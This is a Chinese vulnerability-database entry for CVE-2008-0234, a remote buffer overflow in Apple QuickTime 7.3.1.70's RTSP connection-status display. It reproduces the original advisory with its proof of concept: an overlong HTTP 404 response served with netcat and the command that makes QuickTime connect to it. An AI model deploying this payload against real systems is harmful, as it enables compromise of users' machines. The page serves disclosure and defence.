Apple QuickTime RTSP连接状态显示远程溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114274 漏洞类型 缓冲区溢出
发布时间 2008-01-10 更新时间 2008-07-10
CVE编号 CVE-2008-0234 CNNVD-ID CNNVD-200801-182
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/4885
https://www.securityfocus.com/bid/27225
https://cxsecurity.com/issue/WLB-2008010036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-182
|漏洞详情
AppleQuickTime是美国苹果(Apple)公司开发的一款多媒体播放软件。该软件能够处理数字视频、媒体段落等多种资源。QuickTime在填充包含有连接状态信息的LCD类屏幕时存在缓冲区溢出漏洞,远程恶意服务器可能利用此漏洞控制用户系统。如果用户跟随了rtsp://连接且服务器的554端口关闭,Quicktime就会自动更改传输方式,在80端口上尝试HTTP协议,LCD类屏幕会显示服务器的404错误消息。
|漏洞EXP
#######################################################################

                             Luigi Auriemma

Application:  Quicktime Player
              http://www.apple.com/quicktime
Versions:     <= 7.3.1.70
Platforms:    Windows and Mac
Bug:          buffer-overflow
Exploitation: remote
Date:         10 Jan 2008
Thanx to:     swirl for the help during the re-testing of the bug
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Quicktime is a well known media player developed by Apple.


#######################################################################

======
2) Bug
======


The problem is a buffer-overflow which happens during the filling of
the LCD-like screen containing info about the status of the connection.

For exploiting this vulnerability is only needed that an user follows
a rtsp:// link, if the port 554 of the server is closed Quicktime will
automatically change the transport and will try the HTTP protocol on
port 80, the 404 error message of the server (other error numbers are
valid too) will be visualized in the LCD-like screen.

During my tests I have been able to fully overwrite the return address
anyway note that the visible effects of the vulnerability could change
during the usage of the debugger (in attaching mode it's everything
ok).


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/quicktimebof.txt

quicktimebof.txt
HTTP/1.1 404 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxy

  nc -l -p 80 -v -v -n < quicktimebof.txt

and then

  QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3


#######################################################################

======
4) Fix
======


No fix


#######################################################################

# milw0rm.com [2008-01-10]
|受影响的产品
Apple TV 2.0 Apple TV 1.1 Apple TV 1.0 Apple QuickTime Player 7.3.1 .70 Apple QuickTime Player 7.3.1 Apple QuickTime Player 7.1.6 Apple QuickTime Player 7
|参考资料

来源:US-CERT
名称:VU#112179
链接:http://www.kb.cert.org/vuls/id/112179
来源:VUPEN
名称:ADV-2008-2064
链接:http://www.frsirt.com/english/advisories/2008/2064/references
来源:VUPEN
名称:ADV-2008-0107
链接:http://www.frsirt.com/english/advisories/2008/0107
来源:APPLE
名称:APPLE-SA-2008-07-10
链接:http://lists.apple.com/archives/security-announce/2008//Jul/msg00000.html
来源:XF
名称:quicktime-rtsp-responses-bo(39601)
链接:http://xforce.iss.net/xforce/xfdb/39601
来源:SECTRACK
名称:1019178
链接:http://www.securitytracker.com/id?1019178
来源:BID
名称:27225
链接:http://www.securityfocus.com/bid/27225
来源:BUGTRAQ
名称:20080112Re:Buffer-overflowinQuicktimePlayer7.3.1.70
链接:http://www.securityfocus.com/archive/1/archive/1/486268/100/0/threaded
来源:BUGTRAQ
名称:20080112Re:Re:Buffer-overflowinQuicktimePlayer7.3.1.70
链接:http://www.securityfocus.com/archive/1/archive/1/486241/100/0/threaded
来源:BUGTRAQ
名称:20080114Re:[Full-disclosure]Buffer-overflowinQuicktimePlayer7.3.1.70
链接:http://www.securityfocus.com/archive/1/archive/1/486238/100/0/threaded